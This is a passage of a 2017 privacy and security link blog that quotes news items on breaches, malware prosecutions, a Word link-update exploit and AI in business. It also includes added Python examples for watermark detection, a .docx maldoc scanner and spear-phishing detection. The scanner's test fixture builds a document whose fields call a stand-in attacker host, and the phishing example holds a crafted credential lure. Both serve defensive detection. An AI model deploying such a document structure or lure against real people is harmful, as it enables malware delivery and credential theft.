Monday, August 21, 2017

Reads like the plot for a comedy.
Paul Sperry reports:
Federal authorities are investigating whether sensitive data was stolen from congressional offices by several Pakistani-American tech staffers and sold to Pakistani or Russian intelligence, knowledgeable sources say.
What started out 16 months ago as a scandal involving the alleged theft of computer equipment from Congress has turned into a national-security investigation involving FBI surveillance of the suspects.
Read more on NY Post.
[From the article: 
When the suspected IT workers couldn’t produce the missing invoiced equipment, sources say, they were removed from working on the computer network in early February.
During the probe, investigators found valuable government data that is believed to have been taken from the network and placed on offsite servers, setting off more alarms.  Some 80 offices were potentially compromised.
   For more than a decade, Awan, his wife, two relatives and a friend worked for 30 House Democrats.
   The Democrats who hired the five suspects apparently did a poor job vetting them.
   Most had relatively little IT experience.  Yet they hauled in a combined $4 million-plus over the past decade.  One, a former McDonald’s worker, was suddenly making as much as a chief of staff.
   Awan had access to Wasserman Schultz’s e-mails at both Congress and the DNC, where he had been given the password to her iPad.  After DNC e-mails and research files were stolen during the presidential election, Wasserman Schultz reportedly refused to turn over the server to the FBI and instead called in a private firm to investigate and ID the hackers.  The firm blamed the Russian government, while admitting, “We don’t have hard evidence.”  The corrupted DNC server, held in storage, still has not been examined by the FBI.


Dealing with hacking anywhere?   
Alex Berengaut of Covington & Burling analyzes some of the legal issues raised by the indictment of Marcus Hutchins (@malwaretechblog) for allegedly creating and conspiring to sell malware known as the Kronos banking trojan.  He writes, in part:
Since Hutchins’ indictment, commentators have questioned whether the creation and selling of malware—without actually using the malware—violates the two statutes under which Hutchins was charged: the Computer Fraud and Abuse Act and the Wiretap Act.[1]  It is likely that these issues will be litigated as the case unfolds.
But there is another question raised by the indictment: whether it violates Hutchins’ constitutional rights to charge him for his alleged conduct under any statute in this country.  Several circuits—including the Seventh Circuit, where Hutchins’ case will be heard—have recognized that the federal government cannot charge anyone, anywhere in the world irrespective of their connections to the United States.[2]  As the Second Circuit has put it, “[i]n order to apply extraterritorially a federal criminal statute to a defendant consistently with due process, there must be a sufficient nexus between the defendant and the United States so that such application would not be arbitrary and fundamentally unfair.”[3]
Read more on Covington & Burling Inside Privacy.


Perspective.  Why is AI finding a home in businesses?
CenturyLink Using AI to Boost Sales Efficiency
   Working with a company called Conversica Inc. and its AI agent named Angie, CenturyLink Inc. can much more quickly work through the thousands of sales leads generated each month through a variety of sources to focus on the ones that can most quickly and effectively become sales and generate revenue.  Conversica's software-as-a-service AI offering has been so successful that for every $1 CenturyLink spends on the service, it generates $20 in revenue, according to a video you can watch here.
   Angie also gets smarter, Gerber says.  "What we call AI is actually a bunch of AIs and some real intelligence too," he comments.  "There is an AI that can interpret what is the best message to send, another focused on how to generate the best response, an AI that actually reads it [and interprets it], another AI that measures intent, and another that says what is the right way to respond."  


How would Martha Stewart get her insider stock tips today?
Guide to Social Media and Securities Laws
Jay Baris and Bradley Berman, MOFO Jumpstarter, August 14, 2017.
“The growing use of social media has created challenges for federal securities regulators, who must enforce antifraud rules that were written at a time when the prevailing technology was the newspaper.  This Guide summarizes how regulation has evolved in the face of the growing use of social media.  Our guide discusses the principal areas of focus for SEC-reporting companies, registered investment advisers, registered investment companies, and registered broker-dealers that use social media.  Read our Guide to Social Media and the Securities Laws.”


Something to inspire my students.
40 Under 40

(Related).  Even better?
35 Innovators Under 35

Sunday, August 20, 2017

They don’t seem to have done much managing…
Shaun Wooler reports:
A computer geek with alleged links to global hacking group Anonymous has stolen patient data from an NHS appointment booking system.
The crook breached a private contractor’s security to access a database containing confidential records on up to 1.2 million people.
SwiftQueue is paid by eight NHS trusts to manage a website, through which patients can book appointments with a GP, hospital or clinic.
They also operate terminals within waiting rooms, where patients can check-in upon arrival.
Read more on The Sun.
[From the article:
The source said the hack exploited weaknesses in SwiftQueue’s software, which should have been patched several years ago.
They claim to have downloaded the company’s entire database, containing 11 million records, including passwords.
    The company said they do not hold patients’ medical records and passwords are encrypted.


A proper response!  Notice that the investigation is being directed by lawyers. 
From their web site, the following breach notification. According to their report to HHS, 266,123 patients were notified.
Notice of Data Breach
At Pacific Alliance Medical Center (PAMC), we understand that the confidentiality and security of medical and personal information is critically important, and we are committed to protecting it.  The purpose of this post is to notify patients and employees of a recent cyber incident that affected PAMC and may have resulted in a compromise of certain electronic files containing medical or personal information.
What Happened
On June 14, 2017, PAMC became aware that certain of its networked computer systems were being affected by a cyber incident.  PAMC suspects that the incident began on or shortly before that date.  Shortly after becoming aware of the issue, PAMC’s Information Technology Department completed a preliminary assessment and determined that certain networked computer systems had been infected by a computer virus that was encrypting (making unreadable) certain files on PAMC’s computer network.  PAMC promptly shut down its networked computer systems, initiated its incident response and recovery procedures, notified the Federal Bureau of Investigation, and began a forensic investigation under the direction of its counsel.  Since then, PAMC has decrypted (made readable again) the affected files and has taken action to restore the affected systems and prevent similar incidents from occurring.


Keeping up with the hackers or correcting omissions? 
Delaware Adds More Stringent Data Breach Notice Requirements
   Companies will be required to tell state residents affected by a data breach within 60 days and notify the state attorney general if a breach affects more than 500 residents.
   Medical and biometric data is included in the list of protected personal data for the first time in Delaware.
The new law also requires companies to provide a year of free credit monitoring services to any Delaware resident whose Social Security number is compromised in a breach.


Big Data Analytics.  It’s easier to remove a million watermarks than to remove just one.
Google shows how easy it is for software to remove watermarks from photos
Google’s research division today detailed just how easy it is for computer algorithms to bypass standard photo watermarking practices, stripping those images of copyright protection and making them vulnerable to reposting across the internet without credit.  The research, presented at a leading computer vision conference in Hawaii back in July, is described in detail in a paper titled, “On the Effectiveness of Visible Watermarks.”
   Dekel and Rubinstein say the core problem with current photo watermarking processes is the high level of consistency in style.  “We show that this consistency can be used to invert the watermarking process — that is, estimate the watermark image and its opacity, and recover the original, watermark-free image underneath,” the duo explain.  “This can all be done automatically, without any user intervention or prior information about the watermark, and by only observing watermarked image collections publicly available online.”   
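The consistency argument can be reproduced on a toy collection.  The following is an added example, not code from Dekel and Rubinstein’s paper: it blends one constructed watermark into a few hundred constructed noise “photos” and takes the pixel-wise median of their gradients.  Each photo’s own gradients are noise and cancel in the median, while the watermark’s edges, identical in every photo, survive, and the watermark box is located from those edges.  The paper’s pipeline continues from here (Poisson reconstruction of the blended watermark, multi-image matting to separate opacity from logo, then subtraction from every image); this example stops at the estimate.  One caveat the toy makes visible: the surviving edge strength is alpha times (logo minus the typical photo value), so opacity and logo are not separable from this step alone.  Photo size, watermark placement and opacity are made-up parameters.

```python
import random
from statistics import median

# Constructed collection: every "photo" is i.i.d. uniform pixel noise, so its
# gradients are zero-median, which is the property the estimate relies on.
HEIGHT, WIDTH = 24, 32
# Constructed watermark: a white logo (value 1.0) blended at 50% opacity over
# rows 8..15 and columns 10..21; the same mask is applied to every photo.
ALPHA = 0.5
LOGO_VALUE = 1.0
WM_ROWS = range(8, 16)
WM_COLS = range(10, 22)


def alpha_at(r, c):
    """Per-pixel watermark opacity: constant inside the box, zero outside."""
    return ALPHA if r in WM_ROWS and c in WM_COLS else 0.0


def make_photo(rng):
    """One constructed 'photo': independent uniform pixels in [0, 1]."""
    return [[rng.random() for _ in range(WIDTH)] for _ in range(HEIGHT)]


def apply_watermark(photo):
    """Standard alpha blend: I = (1 - alpha) * J + alpha * W."""
    return [[(1.0 - alpha_at(r, c)) * photo[r][c] + alpha_at(r, c) * LOGO_VALUE
             for c in range(WIDTH)] for r in range(HEIGHT)]


def grad_x(img):
    """Forward difference along columns: g[r][c] = img[r][c+1] - img[r][c]."""
    return [[img[r][c + 1] - img[r][c] for c in range(WIDTH - 1)] for r in range(HEIGHT)]


def grad_y(img):
    """Forward difference along rows: g[r][c] = img[r+1][c] - img[r][c]."""
    return [[img[r + 1][c] - img[r][c] for c in range(WIDTH)] for r in range(HEIGHT - 1)]


def median_gradient(grads):
    """Pixel-wise median over a list of same-shaped gradient images."""
    rows, cols = len(grads[0]), len(grads[0][0])
    return [[median(g[r][c] for g in grads) for c in range(cols)] for r in range(rows)]


def strong_columns(gx, thresh=0.15):
    """Columns in which some row carries a gradient stronger than thresh."""
    return [c for c in range(len(gx[0])) if max(abs(row[c]) for row in gx) > thresh]


def strong_rows(gy, thresh=0.15):
    """Rows in which some column carries a gradient stronger than thresh."""
    return [r for r in range(len(gy)) if max(abs(v) for v in gy[r]) > thresh]


def build_collection(n, seed=1):
    """n watermarked photos; the seed only makes the constructed data repeatable."""
    rng = random.Random(seed)
    return [apply_watermark(make_photo(rng)) for _ in range(n)]


def locate_watermark(images):
    """Estimate the watermark box from the median gradient of the collection.

    Returns (row_start, row_end, col_start, col_end) as half-open ranges.  A
    forward difference at index i sits between pixels i and i+1, so the box
    starts one past the first strong edge and ends one past the last.
    """
    mx = median_gradient([grad_x(im) for im in images])
    my = median_gradient([grad_y(im) for im in images])
    cols = strong_columns(mx)
    rows = strong_rows(my)
    return (rows[0] + 1, rows[-1] + 1, cols[0] + 1, cols[-1] + 1)


if __name__ == "__main__":
    collection = build_collection(400)
    print("from one photo, columns with strong edges:",
          len(strong_columns(grad_x(collection[0]))), "of", WIDTH - 1)
    print("from the collection, estimated watermark box:", locate_watermark(collection))
```

Running the same edge test on a single photo’s gradient flags every column, which is the point the paper makes: one image does not give the watermark away, a collection of images carrying the identical watermark does.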


It is possible to get technology right.  (Second only to McDonald’s, see the chart.)  Funny how often that requires other, non-technical changes.
Starbucks Teaches Silicon Valley a Lesson in Tech
There were plenty of reasons for skepticism when Starbucks rolled out its digital ordering system nationally in September 2015.  EBay had already rolled out a location-based system that recognized customers as they walked in the door.  Consumers were not particularly impressed; eBay eventually spun off its PayPal unit.  Apple Pay, meanwhile, was launched in 2014 as a faster, more secure method of payment.  Merchants weren’t enthused.  Many never activated the feature.
But Starbucks was still betting that its customers would jump at the chance to preorder coffee and food for pickup at a nearby store.
Sure enough, the company’s mobile order-and-pay feature has become a major hit, one more example of Starbucks’—and coffee’s—universal appeal.  The preorders have actually created bottlenecks at Starbucks’ counters, as pickups collide with in-store orders.  The company is rethinking store layouts and hiring preorder specialists to handle the demand.

(Related).
Americans Love Ordering Pizza on Facebook
The cutthroat U.S. restaurant industry is getting increasingly aggressive about technology, enlisting Facebook Inc. and Amazon.com Inc. in their race to make it easier for customers to order and pay for their food.
Last month, TGI Fridays began letting customers foot the bill using their Amazon accounts.  And pizza chains are locked in an escalating battle to adopt new ordering methods -- a contest that involves chat bots, voice-activated devices and social networks.
Papa John’s International Inc. went so far as to declare itself an “e-commerce company” this month after delivering surprisingly strong results.
   Customers, especially millennials, are no longer content to call up a pizza place and dictate an order over their phone.  And they don’t want to wait in line at the Starbucks register.


At some point, they should hire someone who knows how to run a bank.
Wells Fargo troubles shift from phony bank accounts to real ones
After paying customers millions of dollars for opening phony accounts they did not want, Wells Fargo & Co has said it is now grappling with the possibility it harmed customers by closing real accounts they needed, leaving them without access to funds.
   Some of the complaints described fraudulent deposits of unknown origin.  Others said they were victims of identity theft and Wells Fargo closed their accounts and refused to reopen them or open new ones.  One customer said the bank closed an account after a hacker changed personal information, and then Wells Fargo improperly sent funds to the wrong address.
The complaints had consistent themes of confusion about why accounts were frozen or closed, and reflected desperation over being unable to access money, as well as frustration over not getting help from Wells Fargo's customer service.
   Wells Fargo's major competitors did not report similar issues or regulatory probes in their quarterly filings.

(Related).  Anticipating a huge decline in stock price?  That should get someone’s attention.
Wells Fargo & Target of Unusually Large Options Trading (WFC)
Wells Fargo & Company was the recipient of some unusual options trading activity on Thursday.  Traders acquired 27,464 put options on the stock.  This is an increase of approximately 155% compared to the average daily volume of 10,758 put options.


Perspective.  Has the pendulum swung too far?
Tech Censorship of White Supremacists Draws Criticism From Within Industry
The debate intensified over whether the growing number of tech companies that blocked white supremacists and a neo-Nazi website on the internet have gone too far, as a prominent privacy group questioned the power a few corporations have to censor.


Sometimes, advertisers can use current events creatively.

Saturday, August 19, 2017

Of course, they do.
Hackers Exploit Microsoft Word Auto-Updating Links To Install Spyware
A freelance security consultant and Handler at SANS Internet Storm Center has discovered a rather interesting exploit in Microsoft Word, one that allows an attacker to abuse the productivity program's ability to auto-update links.  This is a feature that is enabled by default—when you add links to external sources like URLs, Word will automatically update them without any prompts.  Therein lies the issue.
   In this case, the Word file tries to access the malicious RTF file.  If it succeeds, it downloads a JavaScript payload.  According to Mertens, the link update is triggered without user interaction and without a prompt warning the user that such an action will take place.
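A defender’s first question is how to spot such documents before they reach Word.  The following added example (not code from Mertens’ diary or the article) scans a .docx for the three things that together make an unattended fetch possible: package relationships whose TargetMode is External, field codes such as INCLUDEPICTURE or DDEAUTO that reference remote content, and the updateFields setting that asks Word to refresh fields on open.  The document it scans is constructed in memory with only the parts the scanner reads; the hostname attacker.invalid is a placeholder.  The page does not describe the exact field or OLE structure of the sample in the article, so the indicators here are the generic ones, not a signature for that maldoc.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
NS_O = "urn:schemas-microsoft-com:office:office"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PR = "http://schemas.openxmlformats.org/package/2006/relationships"

# Field keywords that make Word fetch or execute something outside the file.
RISKY_FIELDS = ("INCLUDEPICTURE", "INCLUDETEXT", "HYPERLINK", "LINK", "DDEAUTO", "DDE", "IMPORT")
REMOTE = re.compile(r"(https?|file|ftp)://", re.IGNORECASE)
SEVERITY_ORDER = ("none", "low", "medium", "high")


def _local(tag):
    return tag.rsplit("}", 1)[-1]


def _field_codes(root):
    """Yield complete field instructions.  Word splits one instruction across
    several instrText runs between fldChar begin and separate/end, so join them;
    fldSimple carries the instruction in an attribute."""
    buf, active = [], False
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "fldChar":
            kind = el.get(f"{{{NS_W}}}fldCharType")
            if kind == "begin":
                buf, active = [], True
            elif kind in ("separate", "end") and active:
                yield "".join(buf)
                buf, active = [], False
        elif tag == "instrText" and active and el.text:
            buf.append(el.text)
        elif tag == "fldSimple":
            yield el.get(f"{{{NS_W}}}instr", "")


def scan_docx(data):
    """Return (severity, description) findings for a .docx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        # 1. Relationships pointing outside the package (what an OLE link or
        #    linked picture resolves through).
        for name in names:
            if name.startswith("word/") and name.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter(f"{{{NS_PR}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                        sev = "high" if rtype == "oleObject" else "medium"
                        findings.append((sev, f"{name}: external {rtype} relationship "
                                              f"{rel.get('Id')} -> {rel.get('Target', '')}"))
        # 2. Field codes and linked OLE objects in the body.
        if "word/document.xml" in names:
            root = ET.fromstring(z.read("word/document.xml"))
            for instr in _field_codes(root):
                words = instr.strip().split(" ", 1)
                keyword = words[0].upper() if words and words[0] else ""
                if keyword in RISKY_FIELDS:
                    sev = "high" if REMOTE.search(instr) or keyword.startswith("DDE") else "low"
                    findings.append((sev, f"field code: {instr.strip()}"))
            for ole in root.iter(f"{{{NS_O}}}OLEObject"):
                if ole.get("Type") == "Link":
                    findings.append(("high", f"linked OLE object r:id={ole.get(f'{{{NS_R}}}id')} "
                                             f"UpdateMode={ole.get('UpdateMode') or 'default'}"))
        # 3. Settings asking Word to refresh all fields when the file opens.
        if "word/settings.xml" in names:
            root = ET.fromstring(z.read("word/settings.xml"))
            upd = root.find(f"{{{NS_W}}}updateFields")
            if upd is not None and upd.get(f"{{{NS_W}}}val", "true").lower() in ("true", "1", "on"):
                findings.append(("medium", "settings.xml: updateFields enabled (fields refresh on open)"))
    return findings


def max_severity(findings):
    return max((s for s, _ in findings), key=SEVERITY_ORDER.index, default="none")


def build_sample_docx(link_target=None):
    """Constructed minimal package (not a real maldoc).  With a link_target it
    carries an INCLUDEPICTURE field, a linked OLE object and updateFields;
    without one it is a plain paragraph."""
    if link_target:
        body = (f'<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
                f'<w:r><w:instrText> INCLUDEPICTURE "</w:instrText></w:r>'
                f'<w:r><w:instrText>{link_target}" \\d</w:instrText></w:r>'
                f'<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
                f'<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
                f'<w:p><w:r><w:object><o:OLEObject Type="Link" ProgID="Word.Document.8" '
                f'r:id="rId2" UpdateMode="Always"/></w:object></w:r></w:p>')
        extra_rel = (f'<Relationship Id="rId2" Type="{NS_R}/oleObject" '
                     f'Target="{link_target}" TargetMode="External"/>')
        settings_body = '<w:updateFields w:val="true"/>'
    else:
        body = "<w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>"
        extra_rel = ""
        settings_body = '<w:zoom w:percent="100"/>'
    document_xml = (f'<w:document xmlns:w="{NS_W}" xmlns:o="{NS_O}" xmlns:r="{NS_R}">'
                    f'<w:body>{body}</w:body></w:document>')
    rels_xml = (f'<Relationships xmlns="{NS_PR}"><Relationship Id="rId1" '
                f'Type="{NS_R}/settings" Target="settings.xml"/>{extra_rel}</Relationships>')
    settings_xml = f'<w:settings xmlns:w="{NS_W}">{settings_body}</w:settings>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        z.writestr("word/settings.xml", settings_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for sev, desc in scan_docx(build_sample_docx("http://attacker.invalid/update.rtf")):
        print(sev, desc)
```

Severity is only a triage hint: HYPERLINK fields with external targets are common in legitimate documents, so the combination worth alerting on is an external relationship or remote field together with something that fires it unattended (a linked OLE object or updateFields), not either indicator alone.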


Getting serious about Cyber Security or merely politics?
CYBERCOM Just Got A Major Pentagon Promotion From The President
In a highly anticipated move, President Donald Trump announced on Aug. 18 that the U.S. Cyber Command would be elevated to the status of a “unified combatant command,” putting it on a par with the likes of Central Command and Special Operations Command.
   But its elevation by the president is the latest product of years of debates over how the United States should structure, support, and prioritize its cybersecurity operations — debates that will probably intensify now, rather than resolve themselves.
For example, Trump added in his statement that Defense Secretary James Mattis was looking into “the possibility of separating United States Cyber Command from the National Security Agency.”  Since its creation in 2009, CYBERCOM has lived under the NSA’s roof at Fort Meade, depended on NSA’s resources, and shared its commander with NSA, as well: The commanding officer of CYBERCOM has historically been the “dual hatted” NSA director.
There are plenty of pros and cons to a CYBERCOM-NSA split, most of which boil down to bureaucratic wranglings over who’s responsible for what and when.  But one issue that’s helped spur the divorce talk is the evolution of different missions for the two agencies.  NSA has historically operated as a “collection” entity, stealthily intercepting communications and hoovering up all the details in them.  CYBERCOM, on the other hand, has been trying its hand as a “disruption” entity, taking offensive actions against hackers and enemies.  It’s hard to run both kinds of ops on a single target through a single point of entry.


I haven’t made many comments about the capability of satellite imaging recently.  Apparently, at least one company has found even commercial grade images adequate for its purpose.
Roofr uses satellite imagery to evaluate the state of your roof
Roofr, which will be graduating from Y Combinator (YC) next week, developed a satellite imagery software that analyzes the state of your roof to determine whether it needs to be replaced.
   The Toronto-based startup offers customers a free online quote using its satellite imagery software, which takes the square footage and slope of the roof.  It is currently using a Google API to capture satellite images from Google Earth.
The team then connects customers with vetted contractors who provide full replacements for any type of roof, including cedar, slate, and metal.


Another step towards replacing lawyers with AI?  (Are you sure that’s a human Judge on the other end?) 
Chinese 'cyber-court' launched for online cases
China has launched a digital "cyber-court" to help deal with a rise in the number of internet-related claims, according to state media.
The Hangzhou Internet Court opened on Friday and heard its first case - a copyright infringement dispute between an online writer and a web company.
Legal agents in Hangzhou and Beijing accessed the court via their computers and the trial lasted 20 minutes.
The court's focus will be civil cases, including online shopping disputes.
Judges were sworn in and the first case was presented on a large screen in the courtroom.
   Defendants and plaintiffs appear before the judge not in person, but via video-chat.
   In some other countries, online portals to allow people to resolve legal disputes in cyber-space already exist.
Canada's Civil Resolution Tribunal started accepting claims for $5,000 (£3,000) or less in British Columbia in June.


Perspective.  Because they succeeded they must be cheating? 
The walls are closing in on tech giants
Tech behemoths Google, Facebook and Amazon are feeling the heat from the far-left and the far-right, and even the center is starting to fold.
Why it matters: Criticism over the companies' size, culture and overall influence in society is getting louder as they infiltrate every part of our lives.  Though it's mostly rhetoric rather than action at the moment, that could change quickly in the current political environment.
Here's a breakdown of the three biggest fights they're facing.

(Related).  Is it really so hard to start a new company?
Trapped in Tech’s Unicorn Land
The land of unicorns looks considerably less magical these days.
Not that private investors have noticed. The IPO market remains anemic for technology companies, and the M&A market isn’t faring that much better.  Yet investors continue to pour money into venture-capital firms, and those firms continue to pour money into technology startups—even the so-called unicorns valued at more than $1 billion.


This has got to be better than forcing everyone in the room to listen to the entire score of Der Ring des Nibelungen each time you get a call.  (Okay, maybe not numbers 5 and 8)

Friday, August 18, 2017

It seems that Security is never considered when using a new technology.  Is there some assumption that someone else will take care of all that “Security Stuff?”  Also, what makes anyone believe that a password is sufficient security? 
A leading US supplier of voting machines confirmed on Thursday that it exposed the personal information of more than 1.8 million Illinois residents.
State authorities and the Federal Bureau of Investigation were alerted this week to a major data leak exposing the names, addresses, dates of birth, partial Social Security numbers, and party affiliations of over a million Chicago residents.  Some driver’s license and state ID numbers were also exposed.
Jon Hendren, who works for the cyber resilience firm UpGuard, discovered the breach on an Amazon Web Services (AWS) device that was not secured by a password.  The voter data was then downloaded by cyber risk analyst Chris Vickery who determined Election Systems & Software (ES&S) controlled the data. ES&S provides voting machines and services in at least 42 states.


Perfect for my Software Assurance class.
Well, this sounds like an epic FAIL on the City of Yonkers’ part, doesn’t it?
City of Yonkers – Information Technology (Westchester County)
The IT department’s acceptable computer use policy was not signed or acknowledged by all employees and city officials have also not classified personal, private and sensitive information based on its level of sensitivity and the potential impact should that data be disclosed, altered or destroyed without authorization.  In addition, city officials have not ensured that employees received adequate cyber security training and have not adopted a breach notification policy or a disaster recovery plan.
You can access the full report here (.pdf).


Gosh, you don’t think the government would lie, do you?  (Me too!) 
Dems want independent probe into FCC cyberattack
Democratic lawmakers are calling for an independent investigation into how the Federal Communications Commission responded to a reported cyberattack in May that crippled the agency’s comment filing system.
Sen. Brian Schatz (D-Hawaii) and Rep. Frank Pallone Jr. (D-N.J.) sent a letter to the Government Accountability Office (GAO) on Thursday that cast doubt on the FCC’s version of the incident.
“While the FCC and the FBI have responded to Congressional inquiries into these [distributed denial of service] attacks, they have not released any records or documentation that would allow for confirmation that an attack occurred, that it was effectively dealt with, and that the FCC has begun to institute measures to thwart future attacks and ensure the security of its systems,” the letter reads.
“As a result, questions remain about the attack itself and more generally about the state of cybersecurity at the FCC — questions that warrant an independent review.”


Perspective.  A partial list of victims.
NotPetya Attack Costs Big Companies Millions


Obvious security? 
Facebook Awards $100,000 Prize for Spear-Phishing Detection Method
   To test their method, the researchers analyzed more than 370 million emails received by a large enterprise’s employees between March 2013 and January 2017.
The first part of the detection method relies on the analysis of two key components: domain reputation features and sender reputation features.  The domain reputation feature involves analyzing the link included in an email to see if it poses a risk.  A URL is considered risky if it has not been visited by many employees from within an organization, or if it has never been visited until very recently.
The sender reputation feature aims to identify spoofing of the sender’s name in the From header, a previously unseen attacker using a name and email address closely resembling a known or authoritative entity, exploitation of compromised user accounts, and suspicious email content (i.e. messages that reference accounts and credentials, or ones that invoke a sense of urgency).
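The two reputation features are cheap to compute from data most enterprises already keep.  The following is an added example, not the researchers’ code (their method scores anomalies across many features; this one uses fixed thresholds so the logic is readable): it derives the domain reputation of each link in a message from a constructed proxy log (how many employees visited the host before the message arrived, and how long ago it was first seen) and the sender reputation from a constructed directory of known senders (display name matches a known sender but the address does not, or the address is within two edits of a known one), and combines both with a check for credential and urgency wording.  The log lines, directory, both messages and the thresholds are all constructed assumptions.

```python
import re
from datetime import datetime
from email.utils import parseaddr
from urllib.parse import urlparse

MIN_VISITORS = 5   # assumption: a host fewer employees have visited is unfamiliar
MIN_DAYS = 30      # assumption: a host first seen more recently than this is new
URL_RE = re.compile(r"https?://[^\s<>\"']+")
LURE_RE = re.compile(r"\b(password|credentials?|verify your account|expires today|immediately|urgent)\b",
                     re.IGNORECASE)

# Constructed proxy log: (timestamp, employee, url).  Not real traffic.
PROXY_LOG = [
    ("2016-11-01T08:00:00", "alice", "https://intranet.example.com/hr/benefits"),
    ("2016-11-15T10:03:00", "bob", "https://intranet.example.com/hr/timesheets"),
    ("2016-12-02T14:41:00", "carol", "https://intranet.example.com/"),
    ("2016-12-20T08:15:00", "dave", "https://intranet.example.com/login"),
    ("2017-01-04T11:30:00", "erin", "https://intranet.example.com/hr/timesheets"),
    ("2017-01-09T16:05:00", "frank", "https://intranet.example.com/"),
    ("2017-01-11T17:58:00", "bob", "https://intranet-example.com.login-reset.net/sso"),
]
# Constructed directory of people whose name an attacker would borrow.
KNOWN_SENDERS = {"Pat Lee": "pat.lee@example.com"}
# Constructed messages.
PHISH_EMAIL = {
    "from": "Pat Lee <pat.lee@examp1e.com>",
    "date": "2017-01-12T08:00:00",
    "body": "Your password expires today. Verify your account immediately at "
            "https://intranet-example.com.login-reset.net/sso",
}
BENIGN_EMAIL = {
    "from": "Pat Lee <pat.lee@example.com>",
    "date": "2017-01-12T09:00:00",
    "body": "Reminder: timesheets are due Friday; submit them at https://intranet.example.com/hr/timesheets",
}


def levenshtein(a, b):
    """Edit distance, used to catch lookalike addresses (examp1e vs example)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_reputation(host, email_time, log):
    """Distinct employees who visited host before the message, and age of the
    first visit; a host nobody or almost nobody has been to is the risky case."""
    visitors, first_seen = set(), None
    for ts, user, url in log:
        t = datetime.fromisoformat(ts)
        if t >= email_time or urlparse(url).hostname != host:
            continue
        visitors.add(user)
        first_seen = t if first_seen is None else min(first_seen, t)
    days = None if first_seen is None else (email_time - first_seen).days
    risky = len(visitors) < MIN_VISITORS or days is None or days < MIN_DAYS
    return {"host": host, "visitors": len(visitors), "days_known": days, "risky": risky}


def sender_reputation(from_header, known):
    """Name spoofing: a known display name on an unknown address.  Lookalike:
    an address a couple of edits away from a known one."""
    name, addr = parseaddr(from_header)
    addr = addr.lower()
    expected = known.get(name)
    name_spoof = expected is not None and expected.lower() != addr
    lookalike = any(0 < levenshtein(addr, k.lower()) <= 2 for k in known.values())
    return {"name": name, "address": addr, "name_spoof": name_spoof, "lookalike": lookalike}


def assess(message, log, known):
    when = datetime.fromisoformat(message["date"])
    links = [domain_reputation(urlparse(u).hostname, when, log) for u in URL_RE.findall(message["body"])]
    sender = sender_reputation(message["from"], known)
    lure = bool(LURE_RE.search(message["body"]))
    domain_risk = any(link["risky"] for link in links)
    sender_risk = sender["name_spoof"] or sender["lookalike"]
    if domain_risk and (sender_risk or lure):
        verdict = "spearphish"
    elif domain_risk or sender_risk:
        verdict = "review"
    else:
        verdict = "benign"
    return {"links": links, "sender": sender, "lure": lure, "verdict": verdict}


if __name__ == "__main__":
    for msg in (PHISH_EMAIL, BENIGN_EMAIL):
        print(msg["from"], "->", assess(msg, PROXY_LOG, KNOWN_SENDERS)["verdict"])
```

The combination matters more than any single feature: a new domain alone is what every legitimate vendor onboarding looks like, and a lookalike address alone could be a typo, but a new domain reached from a borrowed name with credential wording is the pattern the researchers set out to catch.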


If it’s good enough for Russia…
Natalia Gulyaeva, Maria Sedykh, and Bret Cohen write:
On 31 July, the Russian data protection authority, Roskomnadzor, issued guidance for data operators on the drafting of privacy policies to comply with Russian data protection law.  Russia’s 2006 privacy law – Federal Law No. 152-FZ of 27 July 2006 “On Personal Data” (Personal Data Law) – requires, among other things, that Russian data operators must adopt a privacy policy that describes how they process personal data.  This notice requirement is similar to the approach in Europe.  Furthermore, data operators shall publish such a policy online when personal data is collected online or otherwise provide unrestricted access to the policy when personal data is collected offline.  The guidance – although non-binding and recommendatory in nature – emphasizes the regulator’s compliance expectations and should therefore be taken into account by organizations acting as data operators in Russia.


How to write Terms of Service?  More important: How to read them! 
2nd Circuit’s Uber arbitration ruling huge win for app industry
On Thursday, the 2nd U.S. Circuit Court of Appeals ruled that Uber user Spencer Meyer assented to the company’s mandatory arbitration requirement when he clicked a button to complete his registration for the Uber smartphone app.  The 2nd Circuit’s decision, written by Judge Denny Chin for a panel that also included Judges Reena Raggi and Susan Carney, rejected Meyer's argument that he wasn’t on fair notice of the arbitration provision because the Uber registration process presented the app’s terms of service only via hyperlink.  
That's great news for companies with smartphone apps – and not just because the court held that app purchasers can be bound by a “sign-in wrap” that folds assent to terms of service into registration for the app.  The 2nd Circuit also confirmed the obvious: Now that Internet-connected devices have become nearly ubiquitous, smartphone users ought to know that registering for an app has legal consequences.


A project for my students.
Algorithmic Transparency for the Smart City
Brauneis, Robert and Goodman, Ellen P., Algorithmic Transparency for the Smart City (August 2, 2017).  Available at SSRN: https://ssrn.com/abstract=3012499
“Emerging across many disciplines are questions about algorithmic ethics – about the values embedded in artificial intelligence and big data analytics that increasingly replace human decision making.  Many are concerned that an algorithmic society is too opaque to be accountable for its behavior.  An individual can be denied parole or denied credit, fired or not hired for reasons she will never know and cannot be articulated.  In the public sector, the opacity of algorithmic decision making is particularly problematic both because governmental decisions may be especially weighty, and because democratically-elected governments bear special duties of accountability.  Investigative journalists have recently exposed the dangerous impenetrability of algorithmic processes used in the criminal justice field – dangerous because the predictions they make can be both erroneous and unfair, with none the wiser.  We set out to test the limits of transparency around governmental deployment of big data analytics, focusing our investigation on local and state government use of predictive algorithms.  It is here, in local government, that algorithmically-determined decisions can be most directly impactful.  And it is here that stretched agencies are most likely to hand over the analytics to private vendors, which may make design and policy choices out of the sight of the client agencies, the public, or both.  To see just how impenetrable the resulting “black box” 